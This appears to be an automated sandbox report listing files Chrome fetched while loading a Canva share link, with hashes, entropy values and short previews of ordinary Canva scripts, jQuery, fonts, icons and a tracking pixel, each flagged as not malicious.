                                                                                                                                                                                                                                                                    Preview:;// __FILE_CONTENT_FOR__:6adf981daf016320.js.(self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[1991],{../***/ 552859:.function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);self._45f7853dc7660378a038952b53c0953e = self._45f7853dc7660378a038952b53c0953e || {};(function(__c) {var Nh;var Fpa,Gpa;__c.Mh=function(a){return new Promise(b=>setTimeout(b,a))};__c.zpa=function(a){return a.every(b=>"object"!==typeof b)};Nh=__c.Nh=function(a){const b={};for(const d of Object.keys(a)){var c=a[d];null==c||"function"===typeof c||"symbol"===typeof c||Number.isNaN(c)||"number"===typeof c&&!Number.isFinite(c)||(Array.isArray(c)?(c=__c.zpa(c)?c:c.map(Nh),c=c.filter(()=>!0),b[d]=c):b[d]="object"===typeof c?Nh(c):c)}return b};.__c.Oh=function(a){return Nh({design_id:a.Ub,design_version:a.dMa,doctype_id:a.kb,category_id:a.Lk,connected_client_ids:a.QMb,time_since_navigation_start:a.W4b,page
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                    Size (bytes):170
                                                                                                                                                                                                                                                                    Entropy (8bit):5.581988163299826
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:3:VO/YpLEs2MQUWKLY/oFzyH0cGAtdGu1Ryi8o0LAsWsCVzrt+XwCMIr8mdtQGqn:JmsthFzyHlGC29rClrIg7Ir8mdiGqn
                                                                                                                                                                                                                                                                    MD5:1E93961F82C3DDD2442D55C103AD0215
                                                                                                                                                                                                                                                                    SHA1:33B85D1A52C0D01E40E3B9B3AC9B5D6C4028E990
                                                                                                                                                                                                                                                                    SHA-256:E271C10FEB8EA4DDF36FBCEBB49C6B119AD08E60743CAD5CD25AC02B74D8E496
                                                                                                                                                                                                                                                                    SHA-512:D99151D8AA38E16B9EC50AD5B1B383A6020C940542AFC748522FBA5841BD837DC8D77D52AE5BAA7A59A1508A5A10F725C7A48C39D62CDDC03F84A2A4B3B8EB21
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    URL:https://static.canva.com/web/62d716053c361585.ltr.css
                                                                                                                                                                                                                                                                    Preview:./*# sourceMappingURL=data:application/json;base64,eyJ2ZXJzaW9uIjozLCJzb3VyY2VzIjpbXSwibmFtZXMiOltdLCJtYXBwaW5ncyI6IiIsImZpbGUiOiI5N2UzODlkZTczNDczYzI0Lmx0ci5jc3MifQ== */
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (61332)
                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                    Size (bytes):363712
                                                                                                                                                                                                                                                                    Entropy (8bit):5.419604127334395
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:6144:Cv9rN9OcMgfnTkAp+byndFEASWN19+xSp6rLpsPjw0t6c48FFjhVyupU:CdV19+xSp6r6Pjw0t6R8F5hVyd
                                                                                                                                                                                                                                                                    MD5:3AA70A06F21B7952040B8EB5D42A50BC
                                                                                                                                                                                                                                                                    SHA1:1493C8DCAB48FD136310A72BBDA11358FC53DDD9
                                                                                                                                                                                                                                                                    SHA-256:F3C61904D4ED5866C3B734F212838F84AB0D525E5948EB70FB3946CDF0BF10AA
                                                                                                                                                                                                                                                                    SHA-512:C05F749B0A12E0F9EECDF1D796581B9B066497991071C76685CCA819B681A74C1079DEFE070CAE7DC0FB97DCCFE58D5A81A60394AB4438376B531F73553602B5
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    Preview:;// __FILE_CONTENT_FOR__:d2858d877c79e696.js.(self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[3790],{../***/ 228043:.function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);__web_req__(201099);self._45f7853dc7660378a038952b53c0953e = self._45f7853dc7660378a038952b53c0953e || {};(function(__c) {var bz=__c.bz;var dz=__c.dz;var KVb=__c.Za(()=>({mode:[6,__c.aPa,7,__c.$Oa]}),__c.mz);var LVb=__c.L(()=>({tc:__c.Q("phoneNumber",1),Bc:__c.T("countryCode",2)}));var MVb=__c.L(()=>({...__c.oz(),mode:__c.D("A?",5,"EMAIL_LINK"),email:__c.Q(11)}));var NVb=__c.Za(()=>({mode:[3,__c.hPa,4,__c.pz,5,MVb]}),__c.oz);var OVb=__c.L(()=>({email:__c.Q(1),Od:__c.E(2,__c.hz)}));var cY;.__c.QVb=class{async Z2(a,b){const c=b&&b.N&&this.na&&this.na.If("getauthenticationoptions.http_client",b.N);b=dz(bz([cY,"authentication","options"]));const d={tracing:c&&{N:c},Zc:"getauthenticationoptions"},[e,{E4
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1290)
                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                    Size (bytes):5961
                                                                                                                                                                                                                                                                    Entropy (8bit):5.491959404530541
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:96:wJ2jDtlG+FqvyIp+t8XP49gl79eXvmknxN95+VEyLg8/mU+0drGWm4LJI9k:S2jDr9qvyIpQ2TZ6v7nxN95YleRsrGwR
                                                                                                                                                                                                                                                                    MD5:2011B7A377F83AE563A227EFE5DE3A62
                                                                                                                                                                                                                                                                    SHA1:119A71B0AECFEBE84D38C759C44A94622B01ACD3
                                                                                                                                                                                                                                                                    SHA-256:35CBC332D69E43BEDF9D8CD040F8DC90A2F34B5B3065FC30CE0E33D7F92F83A4
                                                                                                                                                                                                                                                                    SHA-512:69529FA083CFD7F3C05FC11EC78E0419C7B7317A7F823768FCA352340C8192D197DE27892B9E53287DDAA6A1C003F153559EA213394F20D895EA9B7671319F6C
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    Preview:(self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[6847],{../***/ 523808:.function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);__web_req__(9164);self._45f7853dc7660378a038952b53c0953e = self._45f7853dc7660378a038952b53c0953e || {};(function(__c) {var cKc=function({data:a,url:b}){try{const c=JSON.stringify(a,void 0,2);return{extra:new Map([["spans",c.slice(0,15500)],["url",b]]),tags:new Map([["telemetry.export.beacon.over_64_kB",String(64E3<c.length)]])}}catch(c){return{tags:new Map([["telemetry.error.serialisation_error","true"]])}}},eKc=function(a,b){dKc(a,b,()=>{const c=a.wba.get(b.qp().spanId)||[];for(const d of c)eKc(a,d)})},dKc=function(a,b,c){var d,e=null!==(d=b.attrs.get("parent_relative_start_ms"))&&void 0!==d?d:b.duration;e="number"===.typeof e?` - ${Math.round(e)}ms`:"";var f=(d=null!=b.parentSpanId)?`${"event"===b.Gz?"[ChildEvent]":"[ChildSpan]"}: `:"[Open
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                    Size (bytes):4414
                                                                                                                                                                                                                                                                    Entropy (8bit):5.9195472440471955
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:96:v6LQztmnE2hqFJmd7l0TlPInbSqVpWV9gr9Fb3+:bs4oCTlGbSqVpWXw9p
                                                                                                                                                                                                                                                                    MD5:A0C86DA7FC37EA50E848C4733761D53E
                                                                                                                                                                                                                                                                    SHA1:7B53A4FE8198AA654C02282134DCC19E0C07CC9A
                                                                                                                                                                                                                                                                    SHA-256:EC2FBAD47E598FE06C7A2B825224B3B1B8D8221F3002E6370E627D459FF0634A
                                                                                                                                                                                                                                                                    SHA-512:6FD3BB6D1392F89DCF63A37A9086517620A63C6D933885ACDB61F99BB8AF137D2DD184C59EF92C173E214711DCEAE9585A5B574AFB422A4A0969D99C86264339
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    URL:https://static.canva.com/static/images/favicon-1.ico
                                                                                                                                                                                                                                                                    Preview:...... .... .(.......(... ...@..... ......................................................@...........#h..!g\."h..!i..#k..$l..$n..$o..%q..%r..'s[.#t..........@...................................................UU..........,]).+_..)b..*j..)l..'l..%l..$k..#m..$q..&u..(y..(z..&t..&u..%v)..........U......................................@@..........3Y..1[..4b..1]..0\..0^../`..,c..+f..)i..&l..%o..%q..&s..&t..)|..'v..(v..........@...............................33......8X .7V..;]..7V..8W..7W..7X..8Z..=_..?b..?e..<g..5g..-i..*m..(q..&s..&t..'u..*...(x..(x .....3f......................@@......CN..?R..@W..=R..=R..>S..?S..GZ..<S...?...5...6...@..!T..?f..;i..0j..-o..)s..'u..'w..*}..(y..'z......@...............UU......PP .HL..IO..EN..DO..CN..GQ..GQ...!..HR................ly...B...O..Dh..7g..3l...q..)v..(w..)|..)z..(x ......U..................SG..UK..PG..NI..LI..NN..FF..76..................................|....>..He..=e..8i..3o..-t..*w..+...){..............@......\A..cG..ZB..XC..VD..VG..QC..OA...
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (3086)
                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                    Size (bytes):6002
                                                                                                                                                                                                                                                                    Entropy (8bit):5.685045939644596
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:96:LZGyd8HxJ6pe62ycZamrgPMIHUMub1cdHQ23rKFfIbHOdEl1:LZLdsxMpz2HZ1EPMlMK1cdT3+FfmOqP
                                                                                                                                                                                                                                                                    MD5:3DFF60FF0A6BBD8440A5A22444DBB88C
                                                                                                                                                                                                                                                                    SHA1:7BDE0CB145577E411C57D4CED1CA7E79C07C9515
                                                                                                                                                                                                                                                                    SHA-256:DDCDF284B1509352C2B622B6C9B7936DA37E93ADF75070273D12D72DCF876AF7
                                                                                                                                                                                                                                                                    SHA-512:03BEF8981469EB6394AEA2B3D346BDA55D883075ED73E4AE99D617C87A4EBAF36202FCB1DCCC8E3DC4D2FC67D2DC4915E1C0A43AAF27CC7C75CC07A6C631DDDF
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    Preview:(self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[3389],{../***/ 201099:.function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);__web_req__(121446);self._45f7853dc7660378a038952b53c0953e = self._45f7853dc7660378a038952b53c0953e || {};(function(__c) {var D=__c.D;var hz;var W=__c.W;var Oa=__c.Oa;var G=__c.G;var id=__c.id;var E=__c.E;var M=__c.M;var T=__c.T;var Q=__c.Q;var L=__c.L;var t=__c.t;var ez;__c.bz=function(a){t(0<a.length);t(a.every(b=>0>b.indexOf("?")));return __c.az(new __c.JOa(["",...a.map(encodeURIComponent)].join("/")))};__c.az=function(a,b){if(!b)return a;if(b instanceof Map)for(const [c,d]of b)__c.cz(a,c,d);else for(const c in b)__c.cz(a,c,b[c]);return a};.__c.cz=function(a,b,c){t(0<b.length);t(!a.params.has(b));if(null!=c)if(Array.isArray(c)){c=c.filter(__c.eb);if(0===c.length)return a;t(c.every(d=>"number"===typeof d||"string"===typeof d));a.params.set(
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                    Size (bytes):2725
                                                                                                                                                                                                                                                                    Entropy (8bit):4.001613792451738
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:48:/a93XK82dedc1J2ghyVSuW2oyhTn2oXU/JS1QwppLYA8n9V7KRSpHW3SdjUjuq:onvcH2wyVSutoqnHWSK4tLYVHH8CEuq
                                                                                                                                                                                                                                                                    MD5:749002F5A04F784CC1802D77D2FED423
                                                                                                                                                                                                                                                                    SHA1:A82F9B14C9946185D475C946B2EA4B1D724732F7
                                                                                                                                                                                                                                                                    SHA-256:E26E8402DEA748478ED971DD8F9626BBC25CEC4776D92A0B768D71A109F82C87
                                                                                                                                                                                                                                                                    SHA-512:883CD33B1406E297B068E93CA509E38A54197BC426766AEF6F79D66BCDA96C172E144D302AF174D2D1FEB58091F9FA13139D80B65B9068D58D0A47F83999E9EB
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    Preview:<svg width="60" height="60" viewBox="0 0 60 60" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M19.808 31.921c0 .963.252 1.612.895 1.612 1.102 0 2.189-2.995 2.189-4.692 0-.762-.202-1.387-.729-1.387-1.211 0-2.355 2.797-2.355 4.467zm22.347-5.011c0 .55.139 1.172.521 1.629.172-.501.415-1.502.415-2.184 0-.408-.09-.701-.388-.701-.3 0-.548.574-.548 1.255zm4.603 5.011c0 .868.252 1.612.891 1.612 1.12 0 2.19-2.995 2.19-4.692 0-.77-.19-1.387-.717-1.387-1.221 0-2.364 2.853-2.364 4.467z" fill="#fff"/><path fill-rule="evenodd" clip-rule="evenodd" d="M60 30c0 16.569-13.431 30-30 30C13.431 60 0 46.569 0 30 0 13.431 13.431 0 30 0c16.569 0 30 13.431 30 30zm-6.515 1.462c.035-.106.106-.16.186-.16.178 0 .329.217.329.569 0 1.333-1.38 2.956-2.968 2.956-1.016 0-1.567-.726-1.783-1.724-.655 1.108-1.51 1.736-2.568 1.736-.972 0-2.097-.66-2.097-3.024 0-.818.174-1.638.468-2.388-.694.492-1.42.507-1.9.445-1.228 2.547-3.258 4.95-4.4 4.95-.928 0-1.524-1.751-1.799-3.92-.88 2.323-2.198 3.91-3.495 3.91-1.17 0-1.7
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:Web Open Font Format (Version 2), TrueType, length 38848, version 1.655
                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                    Size (bytes):38848
                                                                                                                                                                                                                                                                    Entropy (8bit):7.993669247804477
                                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                                    SSDEEP:768:SGQkx5jYojomEnKWP2gtvC7smgmSNW82sdRzCGZMc0wbsNm4NY8vikf:3L5LHNY2gU7ZS2gdCCMcQG8KE
                                                                                                                                                                                                                                                                    MD5:CFF149EE1E9D2BE50AC77BCD86769D05
                                                                                                                                                                                                                                                                    SHA1:A1B8A95DDFE811A098D0298E83DD711E90943732
                                                                                                                                                                                                                                                                    SHA-256:C84DE7E52D68BD3B651219E7085236BABC85A0C7C79F21A14F0CDDDBD0FB4B4C
                                                                                                                                                                                                                                                                    SHA-512:D27E713343F51A75E909B4A01D3F2FFB95EE82E13A1B21A9D3034D3858579E4C3FEBAE76E1AF706B820E51583254281E256B825F1742167E1E072DC59CDF1AE4
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    URL:https://static.canva.com/web/images/cff149ee1e9d2be50ac77bcd86769d05.woff2
                                                                                                                                                                                                                                                                    Preview:wOF2..............%(...L..............................j...?HVAR.^?MVARZ.`?STAT$'(..N/....D.|0....6.$..|..... ..>. [..q..W.....sgtY.....C.m..X=e...`...~9...?-....h[U.t.-.\..Q.zkm..,..k..RP4...%Z#_1q...H...A.P.T.s#..Q...;......[...H|..C....i....AW....V....r..'.....`...$r.C$C$..8&.....]:v\x&N..q..........}..+.Q.$OJ............./.Wdb.a..........}.<....}//..B...BHB.!.K.+.).kT#.J).".Xa,e.JqQDtW..o...R..v.W...........;]..w...........7C0.N.^Q.m.......bAn..c8b...VD..(...Q"Z..y..1...o..O_......L.._.f.&........LC.Z................N....=.Y..]...h.).|....&.1B.....6..].R..3.t)....i........#...`.B.8..D.E\V.(5*...O2..7..93.:.l6.$.B....>._...9..FE.........V.........1...0Al.5g=.....:/...L..3.b......7....... ......j...u...F)......e.g.Xf"C..e...3=..#...y...w...I.@.O.>.J.$........{S.V...e8B.. ."J9..DD."27k"VD..(...}...LHT...a.6-...r..m~.........~.?...NI...!..'F(b.....xb...(."~u...Q..&:.....9#Gm.D....D.&....R|.D..N...:...".......II'.w_#..X...&:..WQ...|...oj...RzP....T|
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                    Size (bytes):271751
                                                                                                                                                                                                                                                                    Entropy (8bit):5.0685414131801165
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:6144:+tah6/K+TCtlMhTze/RZcYmDizK8dB7alFys/WL/umH4N0IPfKu5AA11vrIY:9pZcYmDcHwFygmY1PfjAA1Br3
                                                                                                                                                                                                                                                                    MD5:6A07DA9FAE934BAF3F749E876BBFDD96
                                                                                                                                                                                                                                                                    SHA1:46A436EBA01C79ACDB225757ED80BF54BAD6416B
                                                                                                                                                                                                                                                                    SHA-256:D8AA24ECC6CECB1A60515BC093F1C9DA38A0392612D9AB8AE0F7F36E6EEE1FAD
                                                                                                                                                                                                                                                                    SHA-512:E525248B09A6FB4022244682892E67BBF64A3E875EB889DB43B0A24AB4A75077B5D5D26943CA382750D4FEBC3883193F3BE581A4660065B6FC7B5EC20C4A044B
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    URL:https://code.jquery.com/jquery-3.3.1.js
                                                                                                                                                                                                                                                                    Preview:/*!. * jQuery JavaScript Library v3.3.1. * https://jquery.com/. *. * Includes Sizzle.js. * https://sizzlejs.com/. *. * Copyright JS Foundation and other contributors. * Released under the MIT license. * https://jquery.org/license. *. * Date: 2018-01-20T17:24Z. */.( function( global, factory ) {..."use strict";...if ( typeof module === "object" && typeof module.exports === "object" ) {....// For CommonJS and CommonJS-like environments where a proper `window`...// is present, execute the factory and get jQuery....// For environments that do not have a `window` with a `document`...// (such as Node.js), expose a factory as module.exports....// This accentuates the need for the creation of a real `window`....// e.g. var jQuery = require("jquery")(window);...// See ticket #14549 for more info....module.exports = global.document ?....factory( global, true ) :....function( w ) {.....if ( !w.document ) {......throw new Error( "jQuery requires a window with a document" );.....}.....return factor
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                    Size (bytes):150
                                                                                                                                                                                                                                                                    Entropy (8bit):4.817012895739808
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:3:PouV7uJzhquHbtt6vYk2ZRMRJfHKERSAEtvxLrXZiLKY8KDETqLLMu9MK6c4NGL:hxuJzhqIzyYk+qRU4zEdxXZiqiLMcMKj
                                                                                                                                                                                                                                                                    MD5:84241342D84AC29592A5D9516F8EDF7F
                                                                                                                                                                                                                                                                    SHA1:03C53980E18E17625F439C20E7D438F066202428
                                                                                                                                                                                                                                                                    SHA-256:6E21162BC64073FE9E3D3D6375CA24D04FED1912A5B7716AAC0CB0F2D16FAE7C
                                                                                                                                                                                                                                                                    SHA-512:7509483335C7A30365F7F403098491AC0B44FFFCC68A5CDACB86EC191F02DBDA5B16A20A09E924B6A29AC938578D43BACB9A50115DB5C5668EA27FE1811BD530
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    URL:https://6aqz4yjq5fbp5equ2o4i3rbsxwj5ecr4j3mtsil7cz3qppu3tlra.ar-io.dev/favicon.ico
                                                                                                                                                                                                                                                                    Preview:<!DOCTYPE html>.<html lang="en">.<head>.<meta charset="utf-8">.<title>Error</title>.</head>.<body>.<pre>Cannot GET /favicon.ico</pre>.</body>.</html>.
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                    Size (bytes):42
                                                                                                                                                                                                                                                                    Entropy (8bit):2.9881439641616536
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:3:CUXPQE/xlEy:1QEoy
                                                                                                                                                                                                                                                                    MD5:D89746888DA2D9510B64A9F031EAECD5
                                                                                                                                                                                                                                                                    SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                                                                                                                                                                                                                                    SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                                                                                                                                                                                                                                    SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    URL:https://adservice.google.com/ddm/fls/z/src=9812343;type=websi000;cat=flood0;ord=556796634;gtm=45j91e4bi1v872399471z8812729902z9848341198za200zb812729902;dc_pre=1;u59=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGXBQfQ3AM%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink%26utm_source%3Deditor;u67=guest;u66=false;dma=0;npa=0;gcd=13l3l3l3l1l1;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;tag_exp=101925629~102067555~102067808~102077855~102081485;ps=1;pcor=417781846;s3p=1;~oref=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGXBQfQ3AM%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink%26utm_source%3Deditor
                                                                                                                                                                                                                                                                    Preview:GIF89a.............!.......,...........D.;
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:Web Open Font Format, CFF, length 1136, version 1.0
                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                    Size (bytes):1136
                                                                                                                                                                                                                                                                    Entropy (8bit):6.9205301634912555
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:24:V6x4rfIXZe5PuRlil3RV+cccUUUiQ8H/WTSKo//vSUw8PtIp/U:VaUIZW2KhAcclNirWml//K+tr
                                                                                                                                                                                                                                                                    MD5:B46630E470F4040EBA7033CF2435EDCE
                                                                                                                                                                                                                                                                    SHA1:BA26D2E1DC5BBC01A80446AC65BFFB991953764A
                                                                                                                                                                                                                                                                    SHA-256:3E32AEA52247A81C38B4735E84A28BA27B0CBC33F007A1D14E81E64BA766EADD
                                                                                                                                                                                                                                                                    SHA-512:EFF809CC87517F9048F1C7A16561EF6F956ED0FE50B3382AFAF111B6F159E769DD88AF0DC0D8A03B748D407C5C554789B6148A137AC700F776A260FD153C0AE7
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    URL:https://chunk-composing.canva.com/chunk-batch/images/b46630e470f4040eba7033cf2435edce.woff
                                                                                                                                                                                                                                                                    Preview:wOFFOTTO...p.......,........................CFF ..............&.FFTM...(...........GDEF.............'..OS/2.......G...`X.b.cmap.......7...B....head...0...3...6...hhea...d.......$...ohmtx... .........H.Hmaxp..............P.name.............r.post........... ...3vhea...D..."...$...$vmtx...h............x.c`d``.b.D&.x~...../.".7W.I..%..b...z....L Q..J.V.x.c`d``V`8.......z...P...5..!.....P.....x.c`fX.8.......i...C..f|.`....e`.d..F.$...........p.......q.P....*q...x...1n.0.E..'..".U.:..9...1Cv......(..z...B.%W....!..>.....<....'S6(.Q...Zy...+..|)/..Ey...4y..3.<.f.8.Yy.W4.95..KX|+.X.&.7x..pD$M.,..;F?...[....c..s..;...N1R.h.PA..|..s..\.d.~BC.q.vcl.u....Nv.lJ'uso.....i/K..^....!..q."u%".....Ai...x.c```f.`..F.......|... ... .........J.F6...|@.....}....x.c`f.....F@......(U....x.E.!O.@.G...\.rl....,$$H._...m2.,. d......s.L".T v.`f..o.[;...S.G...Qt...n.........N.I...(x..\p...U.V;.....%......1...A....[:...{......X.T,...5.."qY(..u.Z.(.kU...c..T.Qn.2F..'&>.U(Ff+7i.O.<<[....*g.
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (533), with no line terminators
                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                    Size (bytes):533
                                                                                                                                                                                                                                                                    Entropy (8bit):4.933115570682282
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:12:X5eNcBWFXMOYEBAP5egtIzVWRwHjXJqIK+qIKzg0fUsq5eK:pemBkXWegazdDZq3+q3c08sceK
                                                                                                                                                                                                                                                                    MD5:FEB698008C36A09DFE88AB06A1C3E3B9
                                                                                                                                                                                                                                                                    SHA1:A871FBCBBE298AE7078D06627708B2C106A0FAF3
                                                                                                                                                                                                                                                                    SHA-256:1C4E7E389D73C6ACF7F19CC812514E71230740791FDE8A018C1D7EDCCF1590AE
                                                                                                                                                                                                                                                                    SHA-512:F8E3CA3E49B1C027232D1B3AAB82B5430F4A69334A5E18BEB4469C39D6A24D3F4D3FA4C473F360B619CE734977F0D7EFD03BE6ACB5EB7B9F69295FB2CBF94D9B
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    URL:https://accounts.google.com/gsi/style
                                                                                                                                                                                                                                                                    Preview:#credential_picker_container{border:none;height:330px;position:fixed;right:20px;top:20px;width:391px;z-index:9999}#credential_picker_container iframe{border:none;width:391px;height:330px}#g_a11y_announcement{height:1px;left:-10000px;overflow:hidden;position:absolute;top:auto;width:1px}.L5Fo6c-sM5MNb{border:0;display:block;left:0;position:relative;top:0}.L5Fo6c-bF1uUb{-webkit-border-radius:4px;border-radius:4px;bottom:0;cursor:pointer;left:0;position:absolute;right:0;top:0}.L5Fo6c-bF1uUb:focus{border:none;outline:none}sentinel{}
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1240)
                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                    Size (bytes):12870
                                                                                                                                                                                                                                                                    Entropy (8bit):5.689146131237858
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:384:HQryodW8CBdLpGWFAitx0NV3JUnQpTGX+jR:HSWldLoWFA8x0/2WTV
                                                                                                                                                                                                                                                                    MD5:20E9FF75AA3527CFD46175DEAF4D946C
                                                                                                                                                                                                                                                                    SHA1:0958102C1FED7D3FAFA78B12D62664E427B94011
                                                                                                                                                                                                                                                                    SHA-256:A451DE88C33F48F5CD18186200AE38D6F1AC37CCE91B038C534963E30D54D256
                                                                                                                                                                                                                                                                    SHA-512:EB4945B9E9FA6C944B4E297B206B4755637D3F69DE498C79DF57C038E62867E0B409A0530A3E68FC36ED8858DCD20E811284D2A3211D392CC421E55A76236030
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
